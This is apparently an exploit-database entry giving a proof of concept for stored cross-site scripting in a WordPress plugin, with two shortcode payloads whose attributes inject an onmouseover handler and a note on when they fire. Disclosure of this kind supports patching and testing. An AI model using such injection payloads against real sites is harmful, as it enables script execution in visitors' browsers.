## https://sploitus.com/exploit?id=WPEX-ID:A4895F8D-5A4C-49CB-B144-B761ED82923D Put the following shortcodes in a page/post: 1. [ps2id url='#' class='" onmouseover="alert(/XSS/)']ClickMe![/ps2id] 2. [ps2id_wrap id='" onmouseover="alert(/XSS/)']ClickMe![/ps2id_wrap] The XSS will be triggered when previewing/viewing the related post/page and moving the mouse over the "ClickMe!" (the theme must be compatible with the plugin, this was tested with Twenty Seventeen).